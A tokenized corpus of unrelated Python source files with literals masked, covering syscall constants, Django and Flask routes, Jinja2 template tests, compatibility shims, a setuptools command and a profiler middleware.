= Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setregid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresgid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresgid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setresuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setreuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setreuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_robust_list = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setsid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_thread_area = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_set_tid_address = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_settimeofday = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setuid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setuid32 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_setxattr = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sgetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigaction = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigaltstack = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_signal = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_signalfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_signalfd4 = Constant ( 
'<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigpending = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigprocmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigreturn = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sigsuspend = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_splice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ssetmask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stat64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_statfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_statfs64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_stty = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_swapoff = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_swapon = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_symlink = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_symlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sync = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sync_file_range = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS__sysctl = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sysfs = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sysinfo = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_sys_kexec_load = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_syslog = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_tee = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_tgkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_time = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timer_create = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timer_delete = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:4> ) ) <EOL> SYS_timerfd = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timerfd_gettime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timerfd_settime = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_timer_getoverrun = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:3> ) ) <EOL> 
SYS_timer_gettime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:2> ) ) <EOL> SYS_timer_settime = Constant ( '<STR_LIT>' , ( <NUM_LIT> + <NUM_LIT:1> ) ) <EOL> SYS_times = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_tkill = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_truncate = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_truncate64 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ugetrlimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ulimit = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_umask = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_umount = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_umount2 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_uname = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_unlink = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SYS_unlinkat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_unshare = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_uselib = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_ustat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_utime = Constant ( '<STR_LIT>' , <NUM_LIT:30> ) <EOL> SYS_utimensat = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_utimes = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vfork = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vhangup = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vm86 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vm86old = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vmsplice = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_vserver = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_wait4 = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_waitid = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_waitpid = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SYS_write = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SYS_writev = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall_socket = Constant ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> SYS_socketcall_bind = Constant ( '<STR_LIT>' , <NUM_LIT:2> ) <EOL> SYS_socketcall_connect = Constant ( '<STR_LIT>' , 
<NUM_LIT:3> ) <EOL> SYS_socketcall_listen = Constant ( '<STR_LIT>' , <NUM_LIT:4> ) <EOL> SYS_socketcall_accept = Constant ( '<STR_LIT>' , <NUM_LIT:5> ) <EOL> SYS_socketcall_getsockname = Constant ( '<STR_LIT>' , <NUM_LIT:6> ) <EOL> SYS_socketcall_getpeername = Constant ( '<STR_LIT>' , <NUM_LIT:7> ) <EOL> SYS_socketcall_socketpair = Constant ( '<STR_LIT>' , <NUM_LIT:8> ) <EOL> SYS_socketcall_send = Constant ( '<STR_LIT>' , <NUM_LIT:9> ) <EOL> SYS_socketcall_recv = Constant ( '<STR_LIT>' , <NUM_LIT:10> ) <EOL> SYS_socketcall_sendto = Constant ( '<STR_LIT>' , <NUM_LIT:11> ) <EOL> SYS_socketcall_recvfrom = Constant ( '<STR_LIT>' , <NUM_LIT:12> ) <EOL> SYS_socketcall_shutdown = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall_setsockopt = Constant ( '<STR_LIT>' , <NUM_LIT> ) <EOL> SYS_socketcall_getsockopt = Constant ( '<STR_LIT>' , <NUM_LIT:15> ) <EOL> SYS_socketcall_sendmsg = Constant ( '<STR_LIT>' , <NUM_LIT:16> ) <EOL> SYS_socketcall_recvmsg = Constant ( '<STR_LIT>' , <NUM_LIT> ) </s>
<s> """<STR_LIT>""" <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> import os <EOL> import random as randommod <EOL> _cache = None <EOL> def _load ( ) : <EOL> global _cache <EOL> if _cache is None : <EOL> _cache = set ( ) <EOL> with open ( os . path . join ( os . path . dirname ( __file__ ) , <EOL> '<STR_LIT>' <EOL> ) , '<STR_LIT:r>' ) as fd : <EOL> for line in fd : <EOL> if line : <EOL> _cache . add ( line . strip ( ) ) <EOL> return _cache <EOL> def getall ( ) : <EOL> """<STR_LIT>""" <EOL> return _load ( ) . copy ( ) <EOL> def random ( ) : <EOL> """<STR_LIT>""" <EOL> return randommod . choice ( list ( _load ( ) ) ) </s>
<s> from django . conf . urls import patterns , include , url <EOL> urlpatterns = patterns ( <EOL> '<STR_LIT>' , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : '<STR_LIT>' } , <EOL> name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , name = '<STR_LIT>' ) , <EOL> url ( r'<STR_LIT>' , '<STR_LIT>' , <EOL> name = '<STR_LIT>' ) , <EOL> ) </s>
<s> from flask import Flask , url_for , request , render_template <EOL> from app import app <EOL> @ app . route ( '<STR_LIT:/>' ) <EOL> def hello ( ) : <EOL> url = url_for ( '<STR_LIT>' ) ; <EOL> link = '<STR_LIT>' + url + '<STR_LIT>' ; <EOL> return link ; <EOL> @ app . route ( '<STR_LIT>' ) <EOL> def about ( ) : <EOL> return '<STR_LIT>' ; <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def question ( title ) : <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render_template ( '<STR_LIT>' , <EOL> question = question ) <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> submittedAnswer = request . form [ '<STR_LIT>' ] ; <EOL> if submittedAnswer == answer : <EOL> return render_template ( '<STR_LIT>' ) ; <EOL> else : <EOL> return render_template ( '<STR_LIT>' , <EOL> answer = answer , <EOL> submittedAnswer = submittedAnswer ) ; <EOL> @ app . route ( '<STR_LIT>' , methods = [ '<STR_LIT:GET>' , '<STR_LIT:POST>' ] ) <EOL> def submit ( ) : <EOL> if request . method == '<STR_LIT:GET>' : <EOL> return render_template ( '<STR_LIT>' ) ; <EOL> elif request . method == '<STR_LIT:POST>' : <EOL> question = request . form [ '<STR_LIT>' ] ; <EOL> answer = request . form [ '<STR_LIT>' ] ; <EOL> title = request . form [ '<STR_LIT:title>' ] ; <EOL> return render_template ( '<STR_LIT>' , <EOL> question = question ) ; <EOL> return ; </s>
<s> """<STR_LIT>""" <EOL> import unittest <EOL> from jinja2 . testsuite import JinjaTestCase <EOL> from jinja2 import Environment , TemplateSyntaxError , UndefinedError , DictLoader <EOL> env = Environment ( ) <EOL> class ForLoopTestCase ( JinjaTestCase ) : <EOL> def test_simple ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( seq = list ( range ( <NUM_LIT:10> ) ) ) == '<STR_LIT>' <EOL> def test_else ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_empty_blocks ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_context_vars ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> one , two , _ = tmpl . render ( seq = [ <NUM_LIT:0> , <NUM_LIT:1> ] ) . split ( '<STR_LIT>' ) <EOL> ( one_index , one_index0 , one_revindex , one_revindex0 , one_first , <EOL> one_last , one_length ) = one . split ( '<STR_LIT:|>' ) <EOL> ( two_index , two_index0 , two_revindex , two_revindex0 , two_first , <EOL> two_last , two_length ) = two . split ( '<STR_LIT:|>' ) <EOL> assert int ( one_index ) == <NUM_LIT:1> and int ( two_index ) == <NUM_LIT:2> <EOL> assert int ( one_index0 ) == <NUM_LIT:0> and int ( two_index0 ) == <NUM_LIT:1> <EOL> assert int ( one_revindex ) == <NUM_LIT:2> and int ( two_revindex ) == <NUM_LIT:1> <EOL> assert int ( one_revindex0 ) == <NUM_LIT:1> and int ( two_revindex0 ) == <NUM_LIT:0> <EOL> assert one_first == '<STR_LIT:True>' and two_first == '<STR_LIT:False>' <EOL> assert one_last == '<STR_LIT:False>' and two_last == '<STR_LIT:True>' <EOL> assert one_length == two_length == '<STR_LIT:2>' <EOL> def test_cycling ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> output = tmpl . render ( seq = list ( range ( <NUM_LIT:4> ) ) , through = ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> assert output == '<STR_LIT>' * <NUM_LIT:4> <EOL> def test_scope ( self ) : <EOL> tmpl = env . 
from_string ( '<STR_LIT>' ) <EOL> output = tmpl . render ( seq = list ( range ( <NUM_LIT:10> ) ) ) <EOL> assert not output <EOL> def test_varlen ( self ) : <EOL> def inner ( ) : <EOL> for item in range ( <NUM_LIT:5> ) : <EOL> yield item <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> output = tmpl . render ( iter = inner ( ) ) <EOL> assert output == '<STR_LIT>' <EOL> def test_noniter ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> self . assert_raises ( TypeError , tmpl . render ) <EOL> def test_recursive ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( seq = [ <EOL> dict ( a = <NUM_LIT:1> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:2> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:3> , b = [ dict ( a = '<STR_LIT:a>' ) ] ) <EOL> ] ) == '<STR_LIT>' <EOL> def test_recursive_depth0 ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> self . assertEqual ( tmpl . render ( seq = [ <EOL> dict ( a = <NUM_LIT:1> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:2> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:3> , b = [ dict ( a = '<STR_LIT:a>' ) ] ) <EOL> ] ) , '<STR_LIT>' ) <EOL> def test_recursive_depth ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> self . assertEqual ( tmpl . render ( seq = [ <EOL> dict ( a = <NUM_LIT:1> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:2> , b = [ dict ( a = <NUM_LIT:1> ) , dict ( a = <NUM_LIT:2> ) ] ) , <EOL> dict ( a = <NUM_LIT:3> , b = [ dict ( a = '<STR_LIT:a>' ) ] ) <EOL> ] ) , '<STR_LIT>' ) <EOL> def test_looploop ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( table = [ '<STR_LIT>' , '<STR_LIT>' ] ) == '<STR_LIT>' <EOL> def test_reversed_bug ( self ) : <EOL> tmpl = env . 
from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( items = reversed ( [ <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ] ) ) == '<STR_LIT>' <EOL> def test_loop_errors ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> self . assert_raises ( UndefinedError , tmpl . render ) <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_loop_filter ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_loop_unassignable ( self ) : <EOL> self . assert_raises ( TemplateSyntaxError , env . from_string , <EOL> '<STR_LIT>' ) <EOL> def test_scoped_special_var ( self ) : <EOL> t = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert t . render ( seq = ( '<STR_LIT>' , '<STR_LIT>' ) ) == '<STR_LIT>' <EOL> def test_scoped_loop_var ( self ) : <EOL> t = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert t . render ( seq = '<STR_LIT>' ) == '<STR_LIT>' <EOL> t = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert t . render ( seq = '<STR_LIT>' ) == '<STR_LIT>' <EOL> def test_recursive_empty_loop_iter ( self ) : <EOL> t = env . from_string ( '''<STR_LIT>''' ) <EOL> assert t . render ( dict ( foo = [ ] ) ) == '<STR_LIT>' <EOL> def test_call_in_loop ( self ) : <EOL> t = env . from_string ( '''<STR_LIT>''' ) <EOL> assert t . render ( ) == '<STR_LIT>' <EOL> def test_scoping_bug ( self ) : <EOL> t = env . from_string ( '''<STR_LIT>''' ) <EOL> assert t . render ( foo = ( <NUM_LIT:1> , ) ) == '<STR_LIT>' <EOL> def test_unpacking ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> class IfConditionTestCase ( JinjaTestCase ) : <EOL> def test_simple ( self ) : <EOL> tmpl = env . 
from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_elif ( self ) : <EOL> tmpl = env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_else ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_empty ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_complete ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( a = <NUM_LIT:0> , b = False , c = <NUM_LIT> , d = <NUM_LIT> ) == '<STR_LIT:C>' <EOL> def test_no_scope ( self ) : <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( a = True ) == '<STR_LIT:1>' <EOL> tmpl = env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT:1>' <EOL> class MacrosTestCase ( JinjaTestCase ) : <EOL> env = Environment ( trim_blocks = True ) <EOL> def test_simple ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_scoping ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_arguments ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_varargs ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_simple_call ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_complex_call ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_caller_undefined ( self ) : <EOL> tmpl = self . env . from_string ( '''<STR_LIT>''' ) <EOL> assert tmpl . 
render ( ) == '<STR_LIT:True>' <EOL> def test_include ( self ) : <EOL> self . env = Environment ( loader = DictLoader ( { '<STR_LIT>' : <EOL> '<STR_LIT>' } ) ) <EOL> tmpl = self . env . from_string ( '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def test_macro_api ( self ) : <EOL> tmpl = self . env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . module . foo . arguments == ( '<STR_LIT:a>' , '<STR_LIT:b>' ) <EOL> assert tmpl . module . foo . defaults == ( ) <EOL> assert tmpl . module . foo . name == '<STR_LIT:foo>' <EOL> assert not tmpl . module . foo . caller <EOL> assert not tmpl . module . foo . catch_kwargs <EOL> assert not tmpl . module . foo . catch_varargs <EOL> assert tmpl . module . bar . arguments == ( ) <EOL> assert tmpl . module . bar . defaults == ( ) <EOL> assert not tmpl . module . bar . caller <EOL> assert tmpl . module . bar . catch_kwargs <EOL> assert tmpl . module . bar . catch_varargs <EOL> assert tmpl . module . baz . caller <EOL> def test_callself ( self ) : <EOL> tmpl = self . env . from_string ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> assert tmpl . render ( ) == '<STR_LIT>' <EOL> def suite ( ) : <EOL> suite = unittest . TestSuite ( ) <EOL> suite . addTest ( unittest . makeSuite ( ForLoopTestCase ) ) <EOL> suite . addTest ( unittest . makeSuite ( IfConditionTestCase ) ) <EOL> suite . addTest ( unittest . makeSuite ( MacrosTestCase ) ) <EOL> return suite </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> import sys <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> try : <EOL> from imp import cache_from_source <EOL> except ImportError : <EOL> def cache_from_source ( py_file , debug = __debug__ ) : <EOL> ext = debug and '<STR_LIT:c>' or '<STR_LIT:o>' <EOL> return py_file + ext <EOL> try : <EOL> callable = callable <EOL> except NameError : <EOL> from collections import Callable <EOL> def callable ( obj ) : <EOL> return isinstance ( obj , Callable ) <EOL> try : <EOL> fsencode = os . fsencode <EOL> except AttributeError : <EOL> def fsencode ( filename ) : <EOL> if isinstance ( filename , bytes ) : <EOL> return filename <EOL> elif isinstance ( filename , str ) : <EOL> return filename . encode ( sys . getfilesystemencoding ( ) ) <EOL> else : <EOL> raise TypeError ( "<STR_LIT>" % <EOL> type ( filename ) . __name__ ) </s>
<s> """<STR_LIT>""" <EOL> from . packages import chardet <EOL> import sys <EOL> _ver = sys . version_info <EOL> is_py2 = ( _ver [ <NUM_LIT:0> ] == <NUM_LIT:2> ) <EOL> is_py3 = ( _ver [ <NUM_LIT:0> ] == <NUM_LIT:3> ) <EOL> is_py30 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:0> ) <EOL> is_py31 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:1> ) <EOL> is_py32 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:2> ) <EOL> is_py33 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:3> ) <EOL> is_py34 = ( is_py3 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:4> ) <EOL> is_py27 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:7> ) <EOL> is_py26 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:6> ) <EOL> is_py25 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:5> ) <EOL> is_py24 = ( is_py2 and _ver [ <NUM_LIT:1> ] == <NUM_LIT:4> ) <EOL> _ver = sys . version . lower ( ) <EOL> is_pypy = ( '<STR_LIT>' in _ver ) <EOL> is_jython = ( '<STR_LIT>' in _ver ) <EOL> is_ironpython = ( '<STR_LIT>' in _ver ) <EOL> is_cpython = not any ( ( is_pypy , is_jython , is_ironpython ) ) <EOL> is_windows = '<STR_LIT:win32>' in str ( sys . platform ) . lower ( ) <EOL> is_linux = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> is_osx = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> is_hpux = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> is_solaris = ( '<STR_LIT>' in str ( sys . platform ) . lower ( ) ) <EOL> try : <EOL> import simplejson as json <EOL> except ImportError : <EOL> import json <EOL> if is_py2 : <EOL> from urllib import quote , unquote , quote_plus , unquote_plus , urlencode , getproxies , proxy_bypass <EOL> from urlparse import urlparse , urlunparse , urljoin , urlsplit , urldefrag <EOL> from urllib2 import parse_http_list <EOL> import cookielib <EOL> from Cookie import Morsel <EOL> from StringIO import StringIO <EOL> from . packages . urllib3 . packages . 
ordered_dict import OrderedDict <EOL> from httplib import IncompleteRead <EOL> builtin_str = str <EOL> bytes = str <EOL> str = unicode <EOL> basestring = basestring <EOL> numeric_types = ( int , long , float ) <EOL> elif is_py3 : <EOL> from urllib . parse import urlparse , urlunparse , urljoin , urlsplit , urlencode , quote , unquote , quote_plus , unquote_plus , urldefrag <EOL> from urllib . request import parse_http_list , getproxies , proxy_bypass <EOL> from http import cookiejar as cookielib <EOL> from http . cookies import Morsel <EOL> from io import StringIO <EOL> from collections import OrderedDict <EOL> from http . client import IncompleteRead <EOL> builtin_str = str <EOL> str = str <EOL> bytes = bytes <EOL> basestring = ( str , bytes ) <EOL> numeric_types = ( int , float ) </s>
<s> import sys <EOL> import os <EOL> def run ( ) : <EOL> base = os . path . dirname ( os . path . dirname ( os . path . abspath ( __file__ ) ) ) <EOL> sys . path . insert ( <NUM_LIT:0> , base ) <EOL> import pip <EOL> return pip . main ( ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> exit = run ( ) <EOL> if exit : <EOL> sys . exit ( exit ) </s>
<s> import distutils , os <EOL> from setuptools import Command <EOL> from setuptools . compat import basestring <EOL> from distutils . util import convert_path <EOL> from distutils import log <EOL> from distutils . errors import * <EOL> class rotate ( Command ) : <EOL> """<STR_LIT>""" <EOL> description = "<STR_LIT>" <EOL> user_options = [ <EOL> ( '<STR_LIT>' , '<STR_LIT:m>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:d>' , "<STR_LIT>" ) , <EOL> ( '<STR_LIT>' , '<STR_LIT:k>' , "<STR_LIT>" ) , <EOL> ] <EOL> boolean_options = [ ] <EOL> def initialize_options ( self ) : <EOL> self . match = None <EOL> self . dist_dir = None <EOL> self . keep = None <EOL> def finalize_options ( self ) : <EOL> if self . match is None : <EOL> raise DistutilsOptionError ( <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> ) <EOL> if self . keep is None : <EOL> raise DistutilsOptionError ( "<STR_LIT>" ) <EOL> try : <EOL> self . keep = int ( self . keep ) <EOL> except ValueError : <EOL> raise DistutilsOptionError ( "<STR_LIT>" ) <EOL> if isinstance ( self . match , basestring ) : <EOL> self . match = [ <EOL> convert_path ( p . strip ( ) ) for p in self . match . split ( '<STR_LIT:U+002C>' ) <EOL> ] <EOL> self . set_undefined_options ( '<STR_LIT>' , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def run ( self ) : <EOL> self . run_command ( "<STR_LIT>" ) <EOL> from glob import glob <EOL> for pattern in self . match : <EOL> pattern = self . distribution . get_name ( ) + '<STR_LIT:*>' + pattern <EOL> files = glob ( os . path . join ( self . dist_dir , pattern ) ) <EOL> files = [ ( os . path . getmtime ( f ) , f ) for f in files ] <EOL> files . sort ( ) <EOL> files . reverse ( ) <EOL> log . info ( "<STR_LIT>" , len ( files ) , pattern ) <EOL> files = files [ self . keep : ] <EOL> for ( t , f ) in files : <EOL> log . info ( "<STR_LIT>" , f ) <EOL> if not self . dry_run : <EOL> os . unlink ( f ) </s>
<s> result = '<STR_LIT>' </s>
<s> """<STR_LIT>""" <EOL> import sys , time , os . path <EOL> try : <EOL> try : <EOL> from cProfile import Profile <EOL> except ImportError : <EOL> from profile import Profile <EOL> from pstats import Stats <EOL> available = True <EOL> except ImportError : <EOL> available = False <EOL> class MergeStream ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * streams ) : <EOL> if not streams : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> self . streams = streams <EOL> def write ( self , data ) : <EOL> for stream in self . streams : <EOL> stream . write ( data ) <EOL> class ProfilerMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , stream = None , <EOL> sort_by = ( '<STR_LIT:time>' , '<STR_LIT>' ) , restrictions = ( ) , profile_dir = None ) : <EOL> if not available : <EOL> raise RuntimeError ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> self . _app = app <EOL> self . _stream = stream or sys . stdout <EOL> self . _sort_by = sort_by 